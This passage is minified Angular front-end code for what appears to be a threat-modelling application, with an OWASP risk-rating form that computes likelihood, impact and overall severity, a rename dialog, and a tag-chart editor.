g9e=function(){return[0,1,3,5,6,9]},VG=function(){return[0,1,3,7,9]},C9e=function(){return[0,2,6,7,9]},y9e=function(){return[0,1,4,9]},b9e=function(){return[0,1,5,9]},M9e=function(){return[0,1,3,5,7,9]},v9e=function(){return[0,1,4,5,9]},A9e=function(){return[0,4,7,9]},T9e=function(){return[0,1,4,6,9]},E9e=function(){return[0,1,5,7,9]},D9e=function(){return[0,2,5,7]},x9e=function(){return[0,2,4,5,6,9]},w9e=function(){return[0,1,3,8,9]},I9e=function(){return[0,1,7,9]},R9e=function(){return[0,3,5,7,9]};function S9e(t,a){if(1&t){const e=Ye();m(0,"table"),s(1,"\n "),m(2,"tr"),s(3,"\n "),m(4,"td",1)(5,"h2",2),s(6,"Likelihood Factors"),u()(),s(7,"\n "),m(8,"td",1)(9,"h2",2),s(10,"Impact Factors"),u()(),s(11,"\n "),u(),s(12,"\n "),m(13,"tr"),s(14,"\n "),m(15,"td",3)(16,"h3",2),s(17,"Threat Agent Factors"),u()(),s(18,"\n "),m(19,"td",3)(20,"h3",2),s(21,"Vulnerability Factors"),u()(),s(22,"\n "),m(23,"td",3)(24,"h3",2),s(25,"Technical Impact Factors"),u()(),s(26,"\n "),m(27,"td",3)(28,"h3",2),s(29,"Business Impact Factors"),u()(),s(30,"\n "),u(),s(31,"\n "),m(32,"tr"),s(33,"\n "),m(34,"td"),s(35,"\n "),m(36,"mat-form-field",4),s(37,"\n "),m(38,"mat-label"),s(39),oe(40,"translate"),u(),s(41,"\n "),m(42,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.SL=n)}),s(43,"\n "),ne(44,t9e,3,4,"mat-option",6),s(45,"\n "),u(),s(46,"\n "),m(47,"mat-icon",7),oe(48,"translate"),s(49,"info"),u(),s(50,"\n "),u(),s(51,"\n "),u(),s(52,"\n "),m(53,"td"),s(54,"\n "),m(55,"mat-form-field",4),s(56,"\n "),m(57,"mat-label"),s(58),oe(59,"translate"),u(),s(60,"\n "),m(61,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.ED=n)}),s(62,"\n "),ne(63,i9e,3,4,"mat-option",6),s(64,"\n "),u(),s(65,"\n "),m(66,"mat-icon",7),oe(67,"translate"),s(68,"info"),u(),s(69,"\n "),u(),s(70,"\n "),u(),s(71,"\n "),m(72,"td"),s(73,"\n "),m(74,"mat-form-field",4),s(75,"\n "),m(76,"mat-label"),s(77),oe(78,"translate"),u(),s(79,"\n "),m(80,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.LC=n)}),s(81,"\n "),ne(82,a9e,3,4,"mat-option",6),s(83,"\n "),u(),s(84,"\n "),m(85,"mat-icon",7),oe(86,"translate"),s(87,"info"),u(),s(88,"\n "),u(),s(89,"\n "),u(),s(90,"\n "),m(91,"td"),s(92,"\n "),m(93,"mat-form-field",4),s(94,"\n "),m(95,"mat-label"),s(96),oe(97,"translate"),u(),s(98,"\n "),m(99,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.FD=n)}),s(100,"\n "),ne(101,n9e,3,4,"mat-option",6),s(102,"\n "),u(),s(103,"\n "),m(104,"mat-icon",7),oe(105,"translate"),s(106,"info"),u(),s(107,"\n "),u(),s(108,"\n "),u(),s(109,"\n "),u(),s(110,"\n "),m(111,"tr"),s(112,"\n "),m(113,"td"),s(114,"\n "),m(115,"mat-form-field",4),s(116,"\n "),m(117,"mat-label"),s(118),oe(119,"translate"),u(),s(120,"\n "),m(121,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.M=n)}),s(122,"\n "),ne(123,o9e,3,4,"mat-option",6),s(124,"\n "),u(),s(125,"\n "),m(126,"mat-icon",7),oe(127,"translate"),s(128,"info"),u(),s(129,"\n "),u(),s(130,"\n "),u(),s(131,"\n "),m(132,"td"),s(133,"\n "),m(134,"mat-form-field",4),s(135,"\n "),m(136,"mat-label"),s(137),oe(138,"translate"),u(),s(139,"\n "),m(140,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.EE=n)}),s(141,"\n "),ne(142,r9e,3,4,"mat-option",6),s(143,"\n "),u(),s(144,"\n "),m(145,"mat-icon",7),oe(146,"translate"),s(147,"info"),u(),s(148,"\n "),u(),s(149,"\n "),u(),s(150,"\n "),m(151,"td"),s(152,"\n "),m(153,"mat-form-field",4),s(154,"\n "),m(155,"mat-label"),s(156),oe(157,"translate"),u(),s(158,"\n "),m(159,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.LI=n)}),s(160,"\n "),ne(161,s9e,3,4,"mat-option",6),s(162,"\n "),u(),s(163,"\n "),m(164,"mat-icon",7),oe(165,"translate"),s(166,"info"),u(),s(167,"\n "),u(),s(168,"\n "),u(),s(169,"\n "),m(170,"td"),s(171,"\n "),m(172,"mat-form-field",4),s(173,"\n "),m(174,"mat-label"),s(175),oe(176,"translate"),u(),s(177,"\n "),m(178,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.RD=n)}),s(179,"\n "),ne(180,c9e,3,4,"mat-option",6),s(181,"\n "),u(),s(182,"\n "),m(183,"mat-icon",7),oe(184,"translate"),s(185,"info"),u(),s(186,"\n "),u(),s(187,"\n "),u(),s(188,"\n "),u(),s(189,"\n "),m(190,"tr"),s(191,"\n "),m(192,"td"),s(193,"\n "),m(194,"mat-form-field",4),s(195,"\n "),m(196,"mat-label"),s(197),oe(198,"translate"),u(),s(199,"\n "),m(200,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.O=n)}),s(201,"\n "),ne(202,l9e,3,4,"mat-option",6),s(203,"\n "),u(),s(204,"\n "),m(205,"mat-icon",7),oe(206,"translate"),s(207,"info"),u(),s(208,"\n "),u(),s(209,"\n "),u(),s(210,"\n "),m(211,"td"),s(212,"\n "),m(213,"mat-form-field",4),s(214,"\n "),m(215,"mat-label"),s(216),oe(217,"translate"),u(),s(218,"\n "),m(219,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.A=n)}),s(220,"\n "),ne(221,d9e,3,4,"mat-option",6),s(222,"\n "),u(),s(223,"\n "),m(224,"mat-icon",7),oe(225,"translate"),s(226,"info"),u(),s(227,"\n "),u(),s(228,"\n "),u(),s(229,"\n "),m(230,"td"),s(231,"\n "),m(232,"mat-form-field",4),s(233,"\n "),m(234,"mat-label"),s(235),oe(236,"translate"),u(),s(237,"\n "),m(238,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.LAV=n)}),s(239,"\n "),ne(240,m9e,3,4,"mat-option",6),s(241,"\n "),u(),s(242,"\n "),m(243,"mat-icon",7),oe(244,"translate"),s(245,"info"),u(),s(246,"\n "),u(),s(247,"\n "),u(),s(248,"\n "),m(249,"td"),s(250,"\n "),m(251,"mat-form-field",4),s(252,"\n "),m(253,"mat-label"),s(254),oe(255,"translate"),u(),s(256,"\n "),m(257,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.NC=n)}),s(258,"\n "),ne(259,u9e,3,4,"mat-option",6),s(260,"\n "),u(),s(261,"\n "),m(262,"mat-icon",7),oe(263,"translate"),s(264,"info"),u(),s(265,"\n "),u(),s(266,"\n "),u(),s(267,"\n "),u(),s(268,"\n "),m(269,"tr"),s(270,"\n "),m(271,"td"),s(272,"\n "),m(273,"mat-form-field",4),s(274,"\n "),m(275,"mat-label"),s(276),oe(277,"translate"),u(),s(278,"\n "),m(279,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.S=n)}),s(280,"\n "),ne(281,h9e,3,4,"mat-option",6),s(282,"\n "),u(),s(283,"\n "),m(284,"mat-icon",7),oe(285,"translate"),s(286,"info"),u(),s(287,"\n "),u(),s(288,"\n "),u(),s(289,"\n "),m(290,"td"),s(291,"\n "),m(292,"mat-form-field",4),s(293,"\n "),m(294,"mat-label"),s(295),oe(296,"translate"),u(),s(297,"\n "),m(298,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.ID=n)}),s(299,"\n "),ne(300,f9e,3,4,"mat-option",6),s(301,"\n "),u(),s(302,"\n "),m(303,"mat-icon",7),oe(304,"translate"),s(305,"info"),u(),s(306,"\n "),u(),s(307,"\n "),u(),s(308,"\n "),m(309,"td"),s(310,"\n "),m(311,"mat-form-field",4),s(312,"\n "),m(313,"mat-label"),s(314),oe(315,"translate"),u(),s(316,"\n "),m(317,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.LAC=n)}),s(318,"\n "),ne(319,p9e,3,4,"mat-option",6),s(320,"\n "),u(),s(321,"\n "),m(322,"mat-icon",7),oe(323,"translate"),s(324,"info"),u(),s(325,"\n "),u(),s(326,"\n "),u(),s(327,"\n "),m(328,"td"),s(329,"\n "),m(330,"mat-form-field",4),s(331,"\n "),m(332,"mat-label"),s(333),oe(334,"translate"),u(),s(335,"\n "),m(336,"mat-select",5),he("valueChange",function(n){return be(e),Me(V().entry.PV=n)}),s(337,"\n "),ne(338,_9e,3,4,"mat-option",6),s(339,"\n "),u(),s(340,"\n "),m(341,"mat-icon",7),oe(342,"translate"),s(343,"info"),u(),s(344,"\n "),u(),s(345,"\n "),u(),s(346,"\n "),u(),s(347,"\n "),m(348,"tr"),s(349,"\n "),m(350,"td")(351,"h3"),s(352,"Threat Agent Factor:"),it(353,"br"),s(354),u()(),s(355,"\n "),m(356,"td")(357,"h3"),s(358,"Vulnerability Factor:"),it(359,"br"),s(360),u()(),s(361,"\n "),m(362,"td")(363,"h3"),s(364,"Technical Impact Factor:"),it(365,"br"),s(366),u()(),s(367,"\n "),m(368,"td")(369,"h3"),s(370,"Business Impact Factor:"),it(371,"br"),s(372),u()(),s(373,"\n "),u(),s(374,"\n "),m(375,"tr"),s(376,"\n "),m(377,"td",1)(378,"h3",2),s(379),u()(),s(380,"\n "),m(381,"td",1)(382,"h3",2),s(383),u()(),s(384,"\n "),u(),s(385,"\n "),m(386,"tr"),s(387,"\n "),m(388,"td",8)(389,"h3"),s(390),u()(),s(391,"\n "),u(),s(392,"\n "),m(393,"tr"),s(394,"\n "),m(395,"td",8),s(396,"Score Vector: "),m(397,"a",9),s(398),u()(),s(399,"\n "),u(),s(400,"\n"),u()}if(2&t){const e=V();g(39),ke(re(40,73,"shared.owasprr.sl")),g(3),F("value",e.entry.SL),g(2),F("ngForOf",kr(137,g9e)),g(3),at("matTooltip",re(48,75,"shared.owasprr.sl.tt")),g(11),ke(re(59,77,"shared.owasprr.ed")),g(3),F("value",e.entry.ED),g(2),F("ngForOf",kr(138,VG)),g(3),at("matTooltip",re(67,79,"shared.owasprr.ed.tt")),g(11),ke(re(78,81,"shared.owasprr.lc")),g(3),F("value",e.entry.LC),g(2),F("ngForOf",kr(139,C9e)),g(3),at("matTooltip",re(86,83,"shared.owasprr.lc.tt")),g(11),ke(re(97,85,"shared.owasprr.fd")),g(3),F("value",e.entry.FD),g(2),F("ngForOf",kr(140,VG)),g(3),at("matTooltip",re(105,87,"shared.owasprr.fd.tt")),g(14),ke(re(119,89,"shared.owasprr.m")),g(3),F("value",e.entry.M),g(2),F("ngForOf",kr(141,y9e)),g(3),at("matTooltip",re(127,91,"shared.owasprr.m.tt")),g(11),ke(re(138,93,"shared.owasprr.ee")),g(3),F("value",e.entry.EE),g(2),F("ngForOf",kr(142,b9e)),g(3),at("matTooltip",re(146,95,"shared.owasprr.ee.tt")),g(11),ke(re(157,97,"shared.owasprr.li")),g(3),F("value",e.entry.LI),g(2),F("ngForOf",kr(143,M9e)),g(3),at("matTooltip",re(165,99,"shared.owasprr.li.tt")),g(11),ke(re(176,101,"shared.owasprr.rd")),g(3),F("value",e.entry.RD),g(2),F("ngForOf",kr(144,v9e)),g(3),at("matTooltip",re(184,103,"shared.owasprr.rd.tt")),g(14),ke(re(198,105,"shared.owasprr.o")),g(3),F("value",e.entry.O),g(2),F("ngForOf",kr(145,A9e)),g(3),at("matTooltip",re(206,107,"shared.owasprr.o.tt")),g(11),ke(re(217,109,"shared.owasprr.a")),g(3),F("value",e.entry.A),g(2),F("ngForOf",kr(146,T9e)),g(3),at("matTooltip",re(225,111,"shared.owasprr.a.tt")),g(11),ke(re(236,113,"shared.owasprr.lav")),g(3),F("value",e.entry.LAV),g(2),F("ngForOf",kr(147,E9e)),g(3),at("matTooltip",re(244,115,"shared.owasprr.lav.tt")),g(11),ke(re(255,117,"shared.owasprr.nc")),g(3),F("value",e.entry.NC),g(2),F("ngForOf",kr(148,D9e)),g(3),at("matTooltip",re(263,119,"shared.owasprr.nc.tt")),g(14),ke(re(277,121,"shared.owasprr.s")),g(3),F("value",e.entry.S),g(2),F("ngForOf",kr(149,x9e)),g(3),at("matTooltip",re(285,123,"shared.owasprr.s.tt")),g(11),ke(re(296,125,"shared.owasprr.id")),g(3),F("value",e.entry.ID),g(2),F("ngForOf",kr(150,w9e)),g(3),at("matTooltip",re(304,127,"shared.owasprr.id.tt")),g(11),ke(re(315,129,"shared.owasprr.lac")),g(3),F("value",e.entry.LAC),g(2),F("ngForOf",kr(151,I9e)),g(3),at("matTooltip",re(323,131,"shared.owasprr.lac.tt")),g(11),ke(re(334,133,"shared.owasprr.pv")),g(3),F("value",e.entry.PV),g(2),F("ngForOf",kr(152,R9e)),g(3),at("matTooltip",re(342,135,"shared.owasprr.pv.tt")),g(13),ke(e.GetLabelThreatAgent()),g(6),ke(e.GetLabelVulnerability()),g(6),ke(e.GetLabelTechnicalImpact()),g(6),ke(e.GetLabelBusinessImpact()),g(7),ct("Likelihood Factor: ",e.GetLabelLikelihood(),""),g(4),ct("Impact Factor: ",e.GetLabelImpact(),""),g(7),ct("Overall Risk Severity: ",e.GetLabelOverallRisk(),""),g(7),at("href",e.GetURL(),nm),g(1),ke(e.GetVector())}}let IT=(()=>{class t{constructor(e,i,n){this.data=e,this.dataService=i,this.translate=n,e&&(this.entry=e.Value)}ngOnInit(){this.GetLabelOverallRisk()}OpenCalculator(){this.GetVector()&&window.open(this.GetURL(),"_blank")}GetFactorThreatAgent(){return this.getFactor([this.entry.SL,this.entry.M,this.entry.O,this.entry.S])}GetFactorVulnerability(){return this.getFactor([this.entry.ED,this.entry.EE,this.entry.A,this.entry.ID])}GetFactorTechnicalImpact(){return this.getFactor([this.entry.LC,this.entry.LI,this.entry.LAV,this.entry.LAC])}GetFactorBusinessImpact(){return this.getFactor([this.entry.FD,this.entry.RD,this.entry.NC,this.entry.PV])}GetFactorLikelihood(){return this.getFactor([this.GetFactorThreatAgent(),this.GetFactorVulnerability()])}GetFactorImpact(){return this.getFactor([this.GetFactorTechnicalImpact(),this.GetFactorBusinessImpact()])}GetLabelThreatAgent(){return this.getFactorCategoryString(this.GetFactorThreatAgent())}GetLabelVulnerability(){return this.getFactorCategoryString(this.GetFactorVulnerability())}GetLabelTechnicalImpact(){return this.getFactorCategoryString(this.GetFactorTechnicalImpact())}GetLabelBusinessImpact(){return this.getFactorCategoryString(this.GetFactorBusinessImpact())}GetLabelLikelihood(){return this.getFactorCategoryString(this.GetFactorLikelihood())}GetLabelImpact(){return this.getFactorCategoryString(this.GetFactorImpact())}GetLabelOverallRisk(){const e=[this.getFactorCategory(this.GetFactorImpact()),this.getFactorCategory(this.GetFactorLikelihood())];let i=cn.None;return e.every(n=>n==dr.High)?i=cn.Critical:e.some(n=>n==dr.High)&&e.some(n=>n==dr.Medium)?i=cn.High:e.every(n=>n==dr.Medium)||e.some(n=>n==dr.High)?i=cn.Medium:e.some(n=>n==dr.Medium)&&(i=cn.Low),i!=this.entry.Score&&setTimeout(()=>{this.entry.Impact=this.getFactorCategory(this.GetFactorImpact()),this.entry.Likelihood=this.getFactorCategory(this.GetFactorLikelihood()),this.entry.Score=i},10),this.translate.instant(vn.ToString(i))}getFactor(e){let i=0;return e.filter(n=>n).forEach(n=>i+=n),i/e.length}getFactorCategory(e){let i=dr.Low;return e>=3&&e<6?i=dr.Medium:e>=6&&(i=dr.High),i}getFactorCategoryString(e){return 0==e?"":this.translate.instant(An.ToString(this.getFactorCategory(e)))+" ("+e.toFixed(2)+")"}GetURL(){return t.GetURL(this.entry)}GetVector(){return t.GetVector(this.entry)}static GetURL(e){let i=t.GetVector(e);return i?"https://owasp-risk-rating.com/?vector=("+i+")":null}static GetVector(e){if(e){let i="";return Object.keys(e).forEach(n=>{e[n]&&n.length<=3&&(i+="/"+n+":"+e[n])}),i}return null}}return t.\u0275fac=function(e){return new(e||t)(Ee(P5,8),Ee(Yi),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-owasp-rr-entry"]],inputs:{entry:"entry"},decls:1,vars:1,consts:[[4,"ngIf"],["colspan","2"],[2,"margin","0"],[2,"width","25%"],["appearance","fill",1,"property-form-field"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matSuffix","","matTooltipShowDelay","1000",3,"matTooltip"],["colspan","4"],["target","_blank",3,"href"],[3,"value"]],template:function(e,i){1&e&&ne(0,S9e,401,153,"table",0),2&e&&F("ngIf",null!=i.entry)},dependencies:[Zi,Ri,oa,nn,un,jr,Nr,yr,Pa,Xi],styles:[".primary-color[_ngcontent-%COMP%], a[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})();function k9e(t,a){if(1&t){const e=Ye();m(0,"button",6),he("click",function(){return be(e),Me(V().Value="")}),s(1,"\n "),m(2,"mat-icon"),s(3,"close"),u(),s(4,"\n "),u()}}let P9e=(()=>{class t{constructor(e,i){this.dialogRef=e,this.data=i}get Value(){return this.data.Object.GetProperty(this.data.Property.ID)}set Value(e){this.data.Object.SetProperty(this.data.Property.ID,e)}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p))},t.\u0275cmp=Wt({type:t,selectors:[["app-rename-dialog"]],decls:20,vars:9,consts:[["mat-dialog-title",""],["appearance","fill",1,"example-form-field"],["matInput","","type","text",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","",3,"click",4,"ngIf"],["align","end"],["mat-button","","cdkFocusInitial","",3,"mat-dialog-close"],["matSuffix","","mat-icon-button","",3,"click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n "),m(6,"mat-form-field",1),s(7,"\n "),m(8,"input",2),he("ngModelChange",function(r){return i.Value=r}),u(),s(9,"\n "),ne(10,k9e,5,0,"button",3),s(11,"\n "),u(),s(12,"\n"),u(),s(13,"\n"),m(14,"mat-dialog-actions",4),s(15,"\n "),m(16,"button",5),s(17),oe(18,"translate"),u(),s(19,"\n"),u()),2&e&&(g(1),ke(re(2,5,"dialog.rename.title")),g(7),F("ngModel",i.Value),g(2),F("ngIf",i.Value),g(6),F("mat-dialog-close",!0),g(1),ke(re(18,7,"general.Close")))},dependencies:[Ri,an,Ta,Ea,oa,da,nn,jr,Xa,vm,Am,Tm,Em,Xi]}),t})();function O9e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",8),he("click",function(){const r=be(e).$implicit;return Me(V().selectedChart=r)}),s(1,"\n "),m(2,"mat-icon",9),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",10),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"button",11),he("click",function(){const r=be(e).$implicit;return Me(V().DeleteChart(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"delete"),u()(),s(13,"\n "),u()}if(2&t){const e=a.$implicit,i=V();Ct("highlight-light",i.selectedChart===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedChart===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(re(7,7,e.Name)),g(3),at("matTooltip",re(10,9,"general.Delete"))}}function N9e(t,a){if(1&t&&(m(0,"mat-option",23),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetTypeName(e)))}}function L9e(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).AddTagToChart(r))}),m(1,"mat-icon",25),s(2,"circle"),u(),s(3),u()}if(2&t){const e=a.$implicit;g(1),ri("color",e.Color),g(2),ct(" ",e.Name,"")}}function z9e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",26),s(1,"\n "),m(2,"mat-icon",9),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",10),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"button",11),he("click",function(){const r=be(e).$implicit;return Me(V(2).RemoveTag(r))}),oe(10,"translate"),m(11,"mat-icon"),s(12,"remove"),u()(),s(13,"\n "),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(6),ke(re(7,3,e.Name)),g(3),at("matTooltip",re(10,5,"general.Remove"))}}function W9e(t,a){if(1&t){const e=Ye();m(0,"div",12),s(1,"\n "),m(2,"mat-form-field",13),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",14),he("ngModelChange",function(n){return be(e),Me(V().selectedChart.Name=n)}),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-form-field",15),s(12,"\n "),m(13,"mat-select",16),he("ngModelChange",function(n){return be(e),Me(V().selectedChart.Type=n)}),s(14,"\n "),ne(15,N9e,3,4,"mat-option",17),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"mat-list",18),he("cdkDropListDropped",function(n){return be(e),Me(V().dropTag(n))}),s(20,"\n "),m(21,"div",3),s(22),oe(23,"translate"),m(24,"button",19),oe(25,"translate"),m(26,"mat-icon"),s(27,"add"),u()(),s(28,"\n "),m(29,"mat-menu",null,20),s(31,"\n "),ne(32,L9e,4,3,"button",21),s(33,"\n "),u(),s(34,"\n "),u(),s(35,"\n "),ne(36,z9e,14,7,"mat-list-item",22),s(37,"\n "),u(),s(38,"\n "),u()}if(2&t){const e=Ti(30),i=V();g(5),ke(re(6,15,"properties.Name")),g(3),at("matTooltip",i.selectedChart.Name),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.selectedChart.Name),g(5),F("ngModel",i.selectedChart.Type),g(2),F("ngForOf",i.GetTypes()),g(4),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),g(3),ct("",re(23,17,"general.Tags")," \n "),g(2),at("matTooltip",re(25,19,"general.Add")),F("matMenuTriggerFor",e),g(8),F("ngForOf",i.GetPossibleTags()),g(4),F("ngForOf",i.selectedChart.MyTags)}}let F9e=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n}get charts(){return this.dataService.Project.GetMyTagCharts()}ngOnInit(){}AddChart(){this.selectedChart=this.dataService.Project.CreateMyTagChart()}DeleteChart(e){this.dialog.OpenDeleteObjectDialog(e).subscribe(i=>{i&&(e==this.selectedChart&&(this.selectedChart=null),this.dataService.Project.DeleteMyTagChart(e))})}AddTagToChart(e){this.selectedChart.AddMyTag(e)}RemoveTag(e){this.selectedChart.RemoveMyTag(e.ID)}GetPossibleTags(){return this.dataService.Project.GetMyTags().filter(e=>!this.selectedChart.MyTags.includes(e))}dropChart(e){Qs(this.dataService.Project.GetMyTagCharts(),e.previousIndex,e.currentIndex)}dropTag(e){Qs(this.selectedChart.Data.myTagIDs,e.previousIndex,e.currentIndex)}GetTypes(){return NG.GetKeys()}GetTypeName(e){return NG.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-tag-charts"]],decls:24,vars:12,consts:[[1,"row",2,"margin-bottom","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],[1,"property-form-field"],[3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],["cdkDropList","",1,"prop-list","reorder-list","property-form-field",3,"cdkDropListDropped"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip",4,"ngFor","ngForOf"],[3,"value"],["mat-menu-item","",3,"click"],[2,"margin-right","5px"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),m(2,"div",1),s(3,"\n "),m(4,"mat-list",2),he("cdkDropListDropped",function(r){return i.dropChart(r)}),s(5,"\n "),m(6,"div",3),s(7),oe(8,"translate"),m(9,"button",4),he("click",function(){return i.AddChart()}),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n "),u(),s(14,"\n "),ne(15,O9e,14,11,"mat-list-item",5),s(16,"\n "),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"div",6),s(20,"\n "),ne(21,W9e,39,21,"div",7),s(22,"\n "),u(),s(23,"\n"),u()),2&e&&(g(4),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),g(3),ct("",re(8,8,"dialog.tagcharts.Charts")," \n "),g(2),at("matTooltip",re(10,10,"general.Add")),g(6),F("ngForOf",i.charts),g(6),F("ngIf",i.selectedChart))},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,da,nn,un,Nr,yr,Xa,ts,is,Or,Lr,rc,Xo,qo,po,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid 